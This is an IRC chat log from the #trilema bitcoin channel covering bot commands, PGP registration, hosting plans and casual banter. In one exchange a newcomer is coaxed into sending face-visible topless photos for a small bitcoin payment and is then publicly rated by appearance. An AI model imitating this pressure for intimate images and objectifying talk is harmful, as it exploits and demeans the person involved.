BTCUSD last: 5641.3, vol: 11995.3985526 | Volume-weighted last average: 6156.54683296 1736417;1510488989;mircea_popescu;http://btcbase.org/log/2017-11-11#1736258 << that's principally the doubtful part of all this. "but is it worth bothering, mr wu ???" 1736418;1510488989;a111;Logged on 2017-11-11 16:05 asciilifeform: http://btcbase.org/log/2017-11-11#1736227 << this kind of picture is really from 'cyberpunk' alt-fyootoor where where is 1e10 people but they all somehow have money and need goodies delivered on rail 1736419;1510489060;mircea_popescu;http://btcbase.org/log/2017-11-11#1736264 << quite so. the whole "you are fucking yourself over" thing MEANS something. it's not an idle "oh noews" from usg.chicklit, "happens" somehow unhappeningly and all is well anyway. 1736420;1510489060;a111;Logged on 2017-11-11 16:11 asciilifeform: http://btcbase.org/log/2017-11-11#1736245 << not only persia, but more or less everyone who did not ride the mcshitburger train to hell, winning in direct proportion to how much they refrained from riding it. 1736421;1510489128;mircea_popescu;http://btcbase.org/log/2017-11-11#1736273 << we're not lacking entries, we're lacking some exemplars of those putative 1e10 folk. 1736422;1510489128;a111;Logged on 2017-11-11 16:43 asciilifeform: ( and will perhaps be a good entry for those hypothetical folx who ain't here yet, but ought to be . i have no intention of doing the whole thing myself, esp. not in near term, my hands are quite full ) 1736423;1510489142;mircea_popescu;so far it's barely a dozen people, and easily a grosse jobs. not the other fucking way around. 1736424;1510489163;mircea_popescu;principal limitative factor for tmsr gdp growth is... a lack of humans. 1736425;1510489382;mircea_popescu;http://btcbase.org/log/2017-11-11#1736282 << now this is sad. 1736426;1510489382;a111;Logged on 2017-11-11 18:52 asciilifeform does not currently have even 1 up-to-top trb node ! 1736427;1510489448;mircea_popescu;http://btcbase.org/log/2017-11-11#1736308 << sewhere lol. 1736428;1510489448;a111;Logged on 2017-11-11 20:19 mod6: gotta start somewhere 1736429;1510493890;mircea_popescu;http://btcbase.org/log/2017-11-11#1736278 << i didn't see anything. 1736430;1510493890;a111;Logged on 2017-11-11 18:48 BingoBoingo wondering what the weird might be with block 494023 1736431;1510494940;davout;meanwhile, buttcash has been pumping insanely during the last 24h hours 1736432;1510495344;mircea_popescu;maybe it wins! 1736433;1510495461;davout;my money's on the other side 1736434;1510496132;davout;they apparently have a hardfork scheduled for tomorrow, with the goal of 'fixing' their diff adjustment algorithm, i'm quite curious to see what happens 1736435;1510497426;mircea_popescu;http://btcbase.org/log/2017-11-11#1736277 << eh nonsense, dood had cyrhosis. died of it. 1736436;1510497426;a111;Logged on 2017-11-11 18:48 asciilifeform: meanwhile, in bizarre ro crackpotteries, http://www.securitate.org/nicu.htm 1736437;1510497787;mircea_popescu;http://btcbase.org/log/2017-11-12#1736360 << and i suppsoe this is going to be news, not the direct result of http://trilema.com/2016/to-be-clear-hillary-clinton-lost-the-presidential-election-on-june-16th-2016/ in any way shape or form and besides what proof do i have. 1736438;1510497787;a111;Logged on 2017-11-12 00:10 BingoBoingo: Prognostication found in the wild: http://www.lessonoflives.com/if-these-tweets-are-legit-the-dnc-is-on-its-last-leg/ 1736439;1510497813;deedbot;http://trilema.com/2017/galati-yachting/ << Trilema - Galati Yachting 1736440;1510499911;mircea_popescu;!!up wer 1736441;1510499912;deedbot;wer voiced for 30 minutes. 1736442;1510499958;wer;Hello 1736443;1510499963;mircea_popescu;hi 1736444;1510499978;wer;how does this work 1736445;1510499994;mircea_popescu;how does what work ? 1736446;1510500014;wer;i came here from this link http://trilema.com/2014/ill-pay-for-your-tits/ 1736447;1510500040;mircea_popescu;ah. write 73421838 on them and post the pic. 1736448;1510500069;wer;i gotta upload it to a link right 1736449;1510500082;mircea_popescu;sure. 1736450;1510500098;mircea_popescu;alternatively can base64 it and put it in p.bvulpes.com i guess 1736451;1510501025;wer;https://imgur.com/a/zogMz 1736452;1510501032;wer;this okay? 1736453;1510501183;mircea_popescu;mno, can't see your face. 1736454;1510501221;wer;oh didn't know face was compulsory 1736455;1510501249;mircea_popescu;well otherwise no way to enforce the "once per person" 1736456;1510501292;mircea_popescu;why so shy, anwyay ? 1736457;1510501301;wer;that's true 1736458;1510501306;wer;just scared 1736459;1510501374;mircea_popescu;fear is the mind eater. 1736460;1510501644;wer;i'll go take it again 1736461;1510501651;wer;face and tits yeah? 1736462;1510501714;mircea_popescu;yeah. 1736463;1510501717;mircea_popescu;!!up wer 1736464;1510501717;deedbot;wer voiced for 30 minutes. 1736465;1510502247;wer;https://imgur.com/a/cU6e7 1736466;1510502665;wer;is it okay? 1736467;1510502762;mircea_popescu;lessee here 1736468;1510502810;mircea_popescu;so it is. do you want your bitcents to an address or are you making a deedbot wallet ? 1736469;1510502884;mircea_popescu;wer ^ 1736470;1510502926;wer;i've got an address 1736471;1510502934;mircea_popescu;what is it ? 1736472;1510502959;wer;just a moment 1736473;1510502963;mircea_popescu;aite. 1736474;1510503056;mircea_popescu;it is at this juncture we notice that the original "don't have to push it this sat, can do by monday np" comment was... http://btcbase.org/log/2017-10-13#1724778 1736475;1510503056;a111;Logged on 2017-10-13 01:54 mircea_popescu: trinque don't sweat it, she'll do it when i tell her to, what. tomorrow, monday, whatever. 1736476;1510503059;mircea_popescu;ONE MONTH AGO 1736477;1510503115;wer;-> 1GrvBXDT2XTnQ83yCsTZmqVtnZto223DkB 1736478;1510503171;mircea_popescu;!!withdraw 0.02 1GrvBXDT2XTnQ83yCsTZmqVtnZto223DkB 1736479;1510503176;deedbot;Get your OTP: http://p.bvulpes.com/pastes/HslFX/?raw=true 1736480;1510503209;mircea_popescu;wer you'll have it later today. 1736481;1510503241;wer;anything i have to do to process it? 1736482;1510503249;mircea_popescu;nah. 1736483;1510503275;mircea_popescu;how did you happen on teh article anyway ? 1736484;1510503301;wer;someone on reddit sent it to me months ago 1736485;1510503310;wer;brought it up in a conversation with a friend 1736486;1510503348;mircea_popescu;ah 1736487;1510503392;mircea_popescu;so what do you do, other than reddit and selfies ? 1736488;1510503461;wer;schooling, learning programming 1736489;1510503473;mircea_popescu;hey, pretty cool. 1736490;1510503485;mircea_popescu;the republic is looking for an office girl in mailand china, if you know anyone. 1736491;1510503493;mircea_popescu;mainland* 1736492;1510503515;mircea_popescu;ben_vulpes hey, can candi be back plox ? 1736493;1510503529;mircea_popescu;!!up webbyz 1736494;1510503529;deedbot;webbyz voiced for 30 minutes. 1736495;1510503531;mircea_popescu;!!up wer 1736496;1510503532;deedbot;wer voiced for 30 minutes. 1736497;1510503817;*;trinque admits he forgot about the tits initiative. 1736498;1510503828;mircea_popescu;how could you forget tits!!1 1736499;1510503902;wer;anything else i could do for bitcoin 1736500;1510503907;mircea_popescu;lots, actually. 1736501;1510503924;mircea_popescu;what's learning programming entail ? lisp ? java ? haskell ? php ? 1736502;1510503962;wer;C# 1736503;1510503966;wer;mainly for games 1736504;1510503975;mircea_popescu;o really ? 1736505;1510503977;mircea_popescu;ty ben_vulpes 1736506;1510503995;mircea_popescu;wer so first off, register your pgp key with deedbot to preserve identity. you do have one yes ? 1736507;1510504020;mircea_popescu;and second off, do the foxybot trade module. let me fish out the spec 1736508;1510504056;mircea_popescu;aha, here it is : http://logs.minigame.bz/2017-10-28.log.html#t22:24:51 1736509;1510504057;lobbesbot;Logged on 2017-10-28 22:24:51: lobbes http://trilema.com/2016/eulora-tradebot-spec/ from http://logs.minigame.bz/2016-09-16.log.html#t17:44:03 1736510;1510504060;mircea_popescu;with context too! 1736511;1510504138;mircea_popescu;trinque it is said, as one could observe, that the entire grandiose complexity of nature was entirely built out of... crosspolination! 1736512;1510504177;ben_vulpes;ftr i have nfi what kills the thing 1736513;1510504185;trinque;fact. today's a bot haxing day anyway. other item in the queue is subcriptions 1736514;1510504230;mircea_popescu;ben_vulpes maybe it just needs a manager to restart it periodically if its down :D 1736515;1510504231;trinque;i.e. shinohai registers his irc bouncer service as a subscription on deedbot, folks can subscribe and automatically pay him per interval 1736516;1510504257;mircea_popescu;trinque next you can introduce underdraw fees, be 100% like a cc comp! 1736517;1510504266;trinque;crash looping, also natural! 1736518;1510504293;mircea_popescu;"sorry sir, your 4 cent subscription to Fishing Today is causing your account with us go into the red every month, at a cost of 70 dollars each." 1736519;1510504313;ben_vulpes;mircea_popescu: :P 1736520;1510504315;trinque;I figured I'd just ping shinohai to turn the person's shit off until new deposit 1736521;1510504332;mircea_popescu;you're building an api around this then ? 1736522;1510504338;trinque;aha 1736523;1510504340;ben_vulpes;mircea_popescu: bot thinks its up, nothing shows in logs, uses precisely same stack i have running elsewhere 1736524;1510504351;mircea_popescu;as long as well isolated, you know. 1736525;1510504368;mircea_popescu;ben_vulpes may well be freenode dubiousness. 1736526;1510504418;ben_vulpes;possible, but candi's the only node so affected 1736527;1510504475;mircea_popescu;in other news, just added the 40th trilema header. i suspect trilema is now the site with the greatest header biodiversity in the history of the internets. 1736528;1510504548;mircea_popescu;!!up candi_lustt 1736529;1510504548;deedbot;candi_lustt voiced for 30 minutes. 1736530;1510504579;mircea_popescu;candi_lustt (^ (/ 39 40) 365) 1736531;1510504594;mircea_popescu;tsk. 1736532;1510504600;ben_vulpes;how did this work 1736533;1510504617;mircea_popescu;!~calc ((39/40) ** 365) 1736534;1510504618;jhvh1;mircea_popescu: ((39/40) ** 365) = 9.698056947029741E-5 1736535;1510504642;mircea_popescu;0.1% chances to miss one if person visits daily for a year. not so terribru. 1736536;1510504673;mircea_popescu;candi_lustt (+ 2 2) 1736537;1510504678;mircea_popescu;candi_lustt: (+ 2 2) 1736538;1510504684;mircea_popescu;hm. 1736539;1510504732;mircea_popescu;candi_lustt: (mpfhf:mpfhf #*1111 4) 1736540;1510504743;mircea_popescu;ben_vulpes methinks her mouth is full. 1736541;1510504750;ben_vulpes;yeah i'm looking into it 1736542;1510505001;mircea_popescu;!!up rog 1736543;1510505002;deedbot;rog voiced for 30 minutes. 1736544;1510505211;rog;hello 1736545;1510505213;mircea_popescu;hi 1736546;1510505248;mircea_popescu;sup rog ? 1736547;1510505257;*;ben_vulpes baffled by the sudden breakage 1736548;1510505293;rog;i was reading thru and found this channel, care to explain a little more about it please? 1736549;1510505339;mircea_popescu;well, reading through what ? #trilema is the forum of the most serene republic, a terrorist organisation dedicated to the dissolution of all fiat sovereigns and the permanent barring of such nonsense in the future. 1736550;1510505414;mircea_popescu;!!up wer 1736551;1510505415;deedbot;wer voiced for 30 minutes. 1736552;1510505424;mircea_popescu;wer i take it you don't have a pgp key ? 1736553;1510505455;wer;i don't think i do no 1736554;1510505464;mircea_popescu;are you on windows or linux ? 1736555;1510505467;rog;yes read it in trilema, i was browsing thru sites doing some research 1736556;1510505470;wer;windoes 1736557;1510505472;wer;windows* 1736558;1510505488;mircea_popescu;wer not such a great situation ; but... kleopatra will make you one, such as it is. 1736559;1510505488;rog;yes no pgp used the web solution 1736560;1510505517;mircea_popescu;it's important to have a rsa key as it's the standard of identity these days. 1736561;1510505530;mircea_popescu;sorta like it was important to have a passport in 1917. 1736562;1510505559;rog;got it 1736563;1510505571;rog;how do i connect thru windows then with a pgp? 1736564;1510505610;mircea_popescu;rog i was talking to her ; connecting is a different matter, you need an irc client. such as possibly mirc ? xchat ? i'm not sure what else is on windows. 1736565;1510505635;mircea_popescu;a pgp key is something like 1736566;1510505635;wer;what do i do after downloading the software 1736567;1510505635;ben_vulpes;!W (mpfhf::mpfhf #*1111 4) 1736568;1510505638;mircea_popescu;!!key mircea_popescu 1736569;1510505639;deedbot;http://wot.deedbot.org/6160E1CAC8A3C52966FD76998A736F0E2FB7B452.asc 1736570;1510505656;ben_vulpes;!!up candi_lustt 1736571;1510505657;deedbot;candi_lustt voiced for 30 minutes. 1736572;1510505657;mircea_popescu;^ that is my key. and because ~everyone knows it, that same ~everyone can tell whether it's me talking or some impostor. 1736573;1510505661;ben_vulpes;!W (mpfhf::mpfhf #*1111 4) 1736574;1510505662;candi_lustt;ben_vulpes: #*1111 (more: http://p.bvulpes.com/pastes/ROX2a/?raw=true ) 1736575;1510505666;mircea_popescu;aha! 1736576;1510505678;mircea_popescu;!W (+ 2 2) 1736577;1510505679;candi_lustt;mircea_popescu: 4 1736578;1510505706;mircea_popescu;!W (^ (/ 39 40) 30) 1736579;1510505707;candi_lustt;mircea_popescu: error, see: http://p.bvulpes.com/pastes/syxR6/?raw=true 1736580;1510505724;mircea_popescu;heh 1736581;1510505732;mircea_popescu;!W (exp (/ 39 40) 30) 1736582;1510505734;candi_lustt;mircea_popescu: error, see: http://p.bvulpes.com/pastes/m8O1l/?raw=true 1736583;1510505761;mircea_popescu;i find it always pays to come up with counterintuitive syntax! 1736584;1510505855;ben_vulpes;you want expt 1736585;1510505860;mircea_popescu;yes pls. 1736586;1510505864;ben_vulpes;http://clhs.lisp.se/Body/f_exp_e.htm 1736587;1510505865;mircea_popescu;!W (expt (/ 39 40) 30) 1736588;1510505865;candi_lustt;mircea_popescu: 539433869154135747306270525845277238187683254801/1152921504606846976000000000000000000000000000000 1736589;1510505878;mircea_popescu;candi_lustt kicks ass. 1736590;1510505903;mircea_popescu;welcum back bish! i say. 1736591;1510505908;ben_vulpes;heh 1736592;1510505950;rog;how do i connect to this chatroom from mirc? 1736593;1510505953;rog;any idea? 1736594;1510505982;mircea_popescu;rog freenode (irc.freenode.net) port port 8001 then join channel #trilema 1736595;1510506014;mircea_popescu;may also want to register that name, seeing how it's a short and suprirsingly not already taken nick. 1736596;1510506037;wer;i've got the pgp keys 1736597;1510506067;mircea_popescu;wer put the pubkey in p.bvulpes.com then say !!register to deedbot. 1736598;1510506083;mircea_popescu;!!help 1736599;1510506083;deedbot;http://deedbot.org/help.html 1736600;1510506127;wer;!!register http://p.bvulpes.com/pastes/PmhDl/?raw=true 1736601;1510506129;deedbot;Import failed for http://p.bvulpes.com/pastes/PmhDl/?raw=true. 1736602;1510506177;mircea_popescu;wer include the tags. http://wot.deedbot.org/6160E1CAC8A3C52966FD76998A736F0E2FB7B452.asc << model. 1736603;1510506205;rog;how do i register it? 1736604;1510506217;wer;http://p.bvulpes.com/pastes/cMim8/?raw=true 1736605;1510506220;wer;whoops 1736606;1510506224;mircea_popescu;!~google register a freenode nick 1736607;1510506224;wer;!!register http://p.bvulpes.com/pastes/cMim8/?raw=true 1736608;1510506225;jhvh1;mircea_popescu: How to Register a Nickname on Freenode : 7 Steps (with Pictures): ; How to Register a Nickname on Freenode : 7 Steps (with Pictures): ; Here'e an example of how to register a nickname on Freenode IRC ...: 1736609;1510506227;deedbot;CB79C616915A4F8AEA51B5D0525A5ED497C8B05D registered as wer. 1736610;1510506228;mircea_popescu;rog ^ 1736611;1510506258;mircea_popescu;wer now take good care of it, if you manage to lose it nobody will believe "i am really wer". well, except in your case we know what you look like, so there's that, but in general speaking... 1736612;1510506270;mircea_popescu;!!rate wer 1 azn hottie / c# student 1736613;1510506272;deedbot;Get your OTP: http://p.bvulpes.com/pastes/wRSSm/?raw=true 1736614;1510506300;wer;so what do i do with the string 1736615;1510506313;mircea_popescu;wer say !!v string 1736616;1510506322;wer;!!v string 1736617;1510506324;mircea_popescu;lol 1736618;1510506338;wer;was that supposed to do something 1736619;1510506339;mircea_popescu;wer say !!v . metasyntactically string 1736620;1510506355;wer;!!v CB79C616915A4F8AEA51B5D0525A5ED497C8B05D 1736621;1510506359;wer;*facepalm 1736622;1510506367;mircea_popescu;!!v 4C3607C06CF5569C420384C36F7A07C2F0BFCD0C28B123CB25093BC742195CB8 1736623;1510506367;deedbot;mircea_popescu rated wer 1 << azn hottie / c# student 1736624;1510506404;mircea_popescu;wer you can now self-voice, so i don't have to up you every half hour. say !!up to deedbot (in private message). it will give you something to decrypt. you decrypt it, then say !!v and you're voiced. 1736625;1510506424;mircea_popescu;!!key wer 1736626;1510506425;deedbot;http://wot.deedbot.org/CB79C616915A4F8AEA51B5D0525A5ED497C8B05D.asc 1736627;1510506436;mircea_popescu;and otherwise, whenever someone needs your key they can just ask it. 1736628;1510506557;wer;nice 1736629;1510506582;mircea_popescu;later on you'll also show up in the wot, like http://wot.deedbot.org/CB79C616915A4F8AEA51B5D0525A5ED497C8B05D.html 1736630;1510506608;mircea_popescu;iirc they're only collated once an hour or such 1736631;1510506615;wer;what's it for 1736632;1510506623;mircea_popescu;well, do you know what the web of trust is ? 1736633;1510506658;mircea_popescu;here, http://trilema.com/2014/what-the-wot-is-for-how-it-works-and-how-to-use-it/ 1736634;1510506739;mircea_popescu;!!up rog_ 1736635;1510506739;deedbot;rog_ voiced for 30 minutes. 1736636;1510506839;wer;what's !!rate 1736637;1510506843;wer;!!rate 1736638;1510506885;mircea_popescu;!!help 1736639;1510506885;deedbot;http://deedbot.org/help.html 1736640;1510506888;mircea_popescu;see in there. 1736641;1510506894;mircea_popescu;!!up rog 1736642;1510506894;deedbot;rog voiced for 30 minutes. 1736643;1510506978;mircea_popescu;!!reputation candi_lustt 1736644;1510506979;deedbot;http://p.bvulpes.com/pastes/CJmXM/?raw=true 1736645;1510506996;mircea_popescu;there's a bunch of reputation management commands, deedbot being the wot registrar of record. 1736646;1510507122;asciilifeform;http://btcbase.org/log/2017-11-12#1736643 << nil ?! 1736647;1510507122;a111;Logged on 2017-11-12 17:16 mircea_popescu: !!reputation candi_lustt 1736648;1510507137;mircea_popescu;apparently nobody bothered. 1736649;1510507142;mircea_popescu;!!reputation asciilifeform 1736650;1510507144;deedbot;http://p.bvulpes.com/pastes/ODyFK/?raw=true 1736651;1510507172;asciilifeform;!#s !!rate candi_lustt 1736652;1510507172;a111;0 results for "!!rate candi_lustt", http://btcbase.org/log-search?q=!!rate%20candi_lustt 1736653;1510507176;asciilifeform;hm tru 1736654;1510507184;mircea_popescu;surprising, right ? but hey. 1736655;1510507186;mircea_popescu;!!up hi 1736656;1510507187;deedbot;hi voiced for 30 minutes. 1736657;1510507202;mircea_popescu;holy hell how do they manage to find all these 2 and 3 letter nicks that aren't reg'd/enforced ?! 1736658;1510507204;asciilifeform;!!rate candi_lustt 1 robot lives to serve 1736659;1510507205;deedbot;candi_lustt is not registered in WoT. 1736660;1510507209;asciilifeform;umm 1736661;1510507235;mircea_popescu;wer voice yourself so we see all this works. 1736662;1510507278;mircea_popescu;!~seen spyked 1736663;1510507278;jhvh1;mircea_popescu: spyked was last seen in #trilema 4 weeks, 6 days, 2 hours, 1 minute, and 53 seconds ago: yeh, this was re. scabs 1736664;1510507286;mircea_popescu;i wonder what became of him. 1736665;1510507310;asciilifeform;wasn't he a maths d00d in ro somewhere 1736666;1510507315;mircea_popescu;aha 1736667;1510507327;mircea_popescu;anyways, ima bbl. 1736668;1510507371;*;asciilifeform read mircea_popescu's latest piece, now wishes to cook and eat an iguana 1736669;1510507388;*;asciilifeform also bbl 1736670;1510507563;wer;hello again 1736671;1510508682;asciilifeform;http://btcbase.org/log/2017-11-12#1736604 << notorious javaturd pgptron btw 1736672;1510508682;a111;Logged on 2017-11-12 17:03 wer: http://p.bvulpes.com/pastes/cMim8/?raw=true 1736673;1510508696;asciilifeform;( 'BCPG' ) 1736674;1510508887;lobbes;speaking of javaturds, my current status on my archive-o-tron: turns out archive.is uses 'cloudflare ddos' protection for their .zip download links. Currently trying to hack my way around that 1736675;1510508932;asciilifeform;lobbes: not only does it, but was dinged by the 'random page of ram' thing last yr 1736676;1510508932;asciilifeform;i still have some afflicted zips ( that for some reason unzipped ok on various folx' boxen, but none of mine ) 1736677;1510509047;asciilifeform;( http://btcbase.org/log/2016-07-21#1508421 thread ) 1736678;1510509047;a111;Logged on 2016-07-21 22:13 asciilifeform: i get a 128k binary turd. 1736679;1510509136;lobbes;nice.. I'm halfway considering if it'd be actually worth it to just try and make my own archiver at this point 1736680;1510509138;asciilifeform;( i'm satisfied that the riddle was solved when it was discovered , much later, that crapflare serves up random pgs of buffer ram in some % of requests ) 1736681;1510509250;asciilifeform;lobbes: there was recently a thread, re how to do it 1736682;1510509455;lobbes;interesting. I may do some log-spelunking later on that 1736683;1510509672;mircea_popescu;lobbes dun think you're not still supposed to make teh market bot btw. i'm... building redundancy :) 1736684;1510509685;mircea_popescu;hi again wer 1736685;1510509755;mircea_popescu;asciilifeform that can't be the explanation, seeing how everyone's zip unpacked it but yours ? 1736686;1510509764;mircea_popescu;!!up rog66 1736687;1510509765;deedbot;rog66 voiced for 30 minutes. 1736688;1510509869;mircea_popescu;lobbes it may be worth your time to get in touch with the guy and explain what you're trying to do. prolly set you up with something if not turn off shitflare altogether. 1736689;1510510010;mircea_popescu;asciilifeform ftr, iguana is eaten by teh natives, all through south america. kinda like frog i guess. 1736690;1510510060;mircea_popescu;anyway, the depicted marina also has yacht sales office. 50 btc buys you a rather comfortable set-up for a coupla ppl. 40 foot, can comfortably fit the occasional landlubber sluts and errythang. 1736691;1510510067;mircea_popescu;30 foot moar like 20 btc at that. 1736692;1510510136;mircea_popescu;what was orlol's riverboat, 20ft ? 1736693;1510510408;lobbes;mircea_popescu, that is a good point. Aite, I'll send that guy an email tonight. Worth a shot 1736694;1510510427;*;lobbes bbl, meat 1736695;1510510432;mircea_popescu;was rather accomodating when i ended up stealing his js to make trilema give selection urls. 1736696;1510510545;mircea_popescu;!!up mobile46836 1736697;1510510546;deedbot;mobile46836 voiced for 30 minutes. 1736698;1510510913;asciilifeform;http://btcbase.org/log/2017-11-12#1736690 << lol 50 btc prolly buys whole street in timis 1736699;1510510913;a111;Logged on 2017-11-12 18:07 mircea_popescu: anyway, the depicted marina also has yacht sales office. 50 btc buys you a rather comfortable set-up for a coupla ppl. 40 foot, can comfortably fit the occasional landlubber sluts and errythang. 1736700;1510511000;asciilifeform;http://btcbase.org/log/2017-11-12#1736685 << i still have the artifacts, if anybody can be arsed . 1736701;1510511000;a111;Logged on 2017-11-12 18:02 mircea_popescu: asciilifeform that can't be the explanation, seeing how everyone's zip unpacked it but yours ? 1736702;1510511052;asciilifeform;http://btcbase.org/log/2017-11-12#1736692 << something like that ( tho not river-, had a keel ) 1736703;1510511052;a111;Logged on 2017-11-12 18:08 mircea_popescu: what was orlol's riverboat, 20ft ? 1736704;1510511087;asciilifeform;the crackpot design thing he's doing nowadays, is moar like riverboat. 1736705;1510512661;ag3nt_zer0;anyone here a fan of Link Wray? I just discovered the guy and it sounds pretty awesome to me... gutter surf 50s rockabilly grunge on acid https://www.youtube.com/watch?v=N1HHHNhB9UU 1736706;1510512721;ag3nt_zer0;and then there is this other dude someone called "modern day link wray", Jimmy Pinch, also quite cool... enjoy :) https://www.youtube.com/watch?v=AYDXMFMDrlc&index=3&list=PLJtMuhVlIYd5wpCgQCNkin_KEaYBjzvrD 1736707;1510513945;mircea_popescu;ah i must've confused them 1736708;1510515643;pete_dushenski;http://btcbase.org/log/2017-11-09#1734838 << tempting but my square footage is somewhat limited in present abode. maybe if i snag second one in vancouver hehe. we'll see. 1736709;1510515643;a111;Logged on 2017-11-09 00:48 BingoBoingo: !~later tell pete_dushenski http://btcbase.org/log/2017-11-09#1734821 << You want in on the alf firesale? 1736710;1510515701;*;pete_dushenski is finally back in the saddle after a whirlwind tour of the four corners of his home "country" 1736711;1510515757;asciilifeform;lol i can't resist asking, which item(s) tempt pete_dushenski 1736712;1510515829;pete_dushenski;encyclopediae 1736713;1510515856;pete_dushenski;but with "railcar" of goodies, surely there's something for everyone 1736714;1510515915;asciilifeform;most of it not worth cost of transport 1736715;1510515983;asciilifeform;( the , dunno, 50, cubometres of dead tree, say ) 1736716;1510516000;pete_dushenski;did asciilifeform have a list of railcar contents posted on blog yet ? you never know what's worth or not worth shipping... 1736717;1510516027;asciilifeform;listed most of what's worth talking about, in the log. 1736718;1510516102;pete_dushenski;link to list of dead tree cubometres ? musta missed it 1736719;1510516120;asciilifeform;ah no that's not done yet 1736720;1510516138;pete_dushenski;aite 1736721;1510516139;asciilifeform;prolly the 1 item that might interest people is the full set of bolix docs 1736722;1510516155;asciilifeform;( occupies whole shelf ) 1736723;1510516199;pete_dushenski;why do you always guess what other ppl will be interested in ? i really do think you'd be surprised if you stopped with the commentary and just listed everything 1736724;1510516274;asciilifeform;because wtf, it isn't worth ~my~ time to catalogue every old toaster in the kitchen, and everypiece of dead tree rubbish that one could get for fiddycents from 'bookfinder' etc 1736725;1510516290;asciilifeform;uniques/rarities strictly. 1736726;1510516401;asciilifeform;at any rate, can't say that it's a very urgent thing -- prolly >1yr to launch day, for asciilifeform 1736727;1510516441;pete_dushenski;ya not saying don't prioritise, just hard to imagine that you have only bolix and encyclopediae that qualify as "uniques/rarities". you're like a walking library and nihil fit ex nihilo. in my mind your library looks like http://images.mentalfloss.com/blogs/wp-content/uploads/2012/05/6551303327_bb9ac1f5d6_z-565x376.jpg 1736728;1510516463;asciilifeform;lol!! 1736729;1510516491;pete_dushenski;(pic is from mega-spectacular libray in rio de janeiro, highly recommended) 1736730;1510516498;pete_dushenski;library* 1736731;1510516520;BingoBoingo;http://btcbase.org/log/2017-11-12#1736437 << They can't handle the truth 1736732;1510516520;a111;Logged on 2017-11-12 14:43 mircea_popescu: http://btcbase.org/log/2017-11-12#1736360 << and i suppsoe this is going to be news, not the direct result of http://trilema.com/2016/to-be-clear-hillary-clinton-lost-the-presidential-election-on-june-16th-2016/ in any way shape or form and besides what proof do i have. 1736733;1510516582;phf;pete_dushenski: that's a common misconception, i suspect asciilifeform's library consists of like 200-300 books, that are heavily annotated, because other books, while really nice to have, is a pain in the ass to manage, so you just cull to the current essentials and somehow source whatever's missing later. 1736734;1510516600;asciilifeform;BingoBoingo: orig link is quite nonsensical tho : ru is ~exporter~ not importer of fissiles 1736735;1510516666;asciilifeform;phf: i annotate in my head 1736736;1510516667;BingoBoingo;asciilifeform: RU is a wholeseller. 1736737;1510516696;asciilifeform;and it's considerably larger but also low snr 1736738;1510516710;asciilifeform;the 300 figure is closer to what i aim for in the launch capsule. 1736739;1510516726;pete_dushenski;phf: i can see that. also, asciilifeform likely has a crate with spinning rust hdd's containing a vault's worth of digital tomes. 1736740;1510516760;pete_dushenski;probably petabytes of txt and scanned wares 1736741;1510516761;asciilifeform;pretty sure i retired the last rust hdd... 1736742;1510516765;BingoBoingo;pete_dushenski: Anyways, looking for new boxes for Contravex, etc 1736743;1510516771;asciilifeform;but somewhere yea 1736744;1510516776;trinque;asciilifeform: take a picture of the book spines before selling, for teh uneducated youf 1736745;1510516792;asciilifeform;at some point , oughta 1736746;1510516802;pete_dushenski;BingoBoingo: hm ? 1736747;1510516854;BingoBoingo;pete_dushenski: You know alf and myself venturing out and making ISPs. If you have wants now would be a good time to submit them and start negotiating. 1736748;1510516898;asciilifeform;oh hey BingoBoingo , got a rack yet ? 1736749;1510516954;BingoBoingo;asciilifeform: Gotta good quote in a hospitable venue. This weeks project is rolling the company ball. 1736750;1510517002;pete_dushenski;BingoBoingo: i have very modest blog hosting needs at this point 1736751;1510517054;BingoBoingo;Modest can be done 1736752;1510517093;pete_dushenski;cool 1736753;1510517117;*;BingoBoingo assembling shopping list. 1736754;1510517196;pete_dushenski;in other shopping oddities, http://www.chinadaily.com.cn/china/2017-09/29/content_32627471_2.htm (hairy crab vending machine!) 1736755;1510517346;*;BingoBoingo considering quad core AMD A8-5545 blade server offering, listing as "Modest Blade" 1736756;1510517427;trinque;thoughts on a rate? 1736757;1510517478;BingoBoingo;trinque: Rate determination requires figuring out my cost basis. 1736758;1510517485;pete_dushenski;awww bch back down to 0.2 after hitting 0.35 last night. but who has any left ? hmm... 1736759;1510518166;pete_dushenski;and in other shortcuts, https://phys.org/news/2017-11-year-malt-whisky-weeks-chemistry.html 1736760;1510518241;*;pete_dushenski al gymnasio 1736761;1510518466;mircea_popescu;iwonder if phf's theory is correcty 1736762;1510518467;BingoBoingo;trinque: Thoughts on a box? 1736763;1510518485;mircea_popescu;irl i held ~10k tomes at home + 1.5mn or so held by the univ library for me 1736764;1510518507;mircea_popescu;(in theory it's "for everyone", but in practice you're lucky if you get 1 user per mn books. cuz wtf do people want with them.) 1736765;1510518551;deedbot;mircea_popescu: http://p.bvulpes.com/pastes/5i3vp/?raw=true 1736766;1510518567;mircea_popescu;but then again, humanities book needs > technical. 1736767;1510519063;trinque;BingoBoingo: got a link to that blade you were talking about? 1736768;1510519159;BingoBoingo;trinque: Blade would be built around BIOSTAR A68N-5545 shoved into "Build a Blade" enclosure linked earler. Some assembly required, but not experimental hardware at the ranch. 1736769;1510519169;BingoBoingo;*alf ranch 1736770;1510519200;trinque;might blade, might rack 1u, depending on what's on offer 1736771;1510519223;*;trinque will review logs to not duplicate details 1736772;1510519273;trinque;mmm don't see it 1736773;1510519402;BingoBoingo;trinque: Racking 1u will give more freedom to spec box, get ECC RAM 1736774;1510519501;BingoBoingo;Could also do humble blade around PC Engines APU board. Idea is minimal viable machine for lord of aspiring lordling to make home while possessing root login. 1736775;1510519570;trinque;what of shipping own box in? 1736776;1510519628;BingoBoingo;That is doable. Still gotta rent space, heat handling, and access to net 1736777;1510519688;trinque;obviously gotta pay for spot 1736778;1510519724;BingoBoingo;Datacenter is close to beaches, so vacation drop off is also option 1736779;1510519832;lobbes;http://btcbase.org/log/2017-11-12#1736751 << I'd be interested in possibly renting some hosting as a VPS type of arrangement. My projects are low-overhead as well, though. currently, I only pay ~$10USD per month for the two VPSes I rent 1736780;1510519832;a111;Logged on 2017-11-12 20:04 BingoBoingo: Modest can be done 1736781;1510520721;BingoBoingo;lobbes: A box for VPS is very probable, that price point is probably not happening. Then again, this will be a week of much math. On the other hand, wouldn't it be nice to have root? 1736782;1510520840;BingoBoingo;trinque: The build a blade thing: http://www.buildablade.com/bb-itx96.htm 1736783;1510520910;BingoBoingo;Including power distribution 7U of rackspace for 9 machines 1736784;1510521229;BingoBoingo;Having one booked up and in luggage would be helpful to ISP cause. 1736785;1510521587;mircea_popescu;http://btcbase.org/log/2017-11-12#1736723 << he has a point, at that. 1736786;1510521587;a111;Logged on 2017-11-12 19:49 pete_dushenski: why do you always guess what other ppl will be interested in ? i really do think you'd be 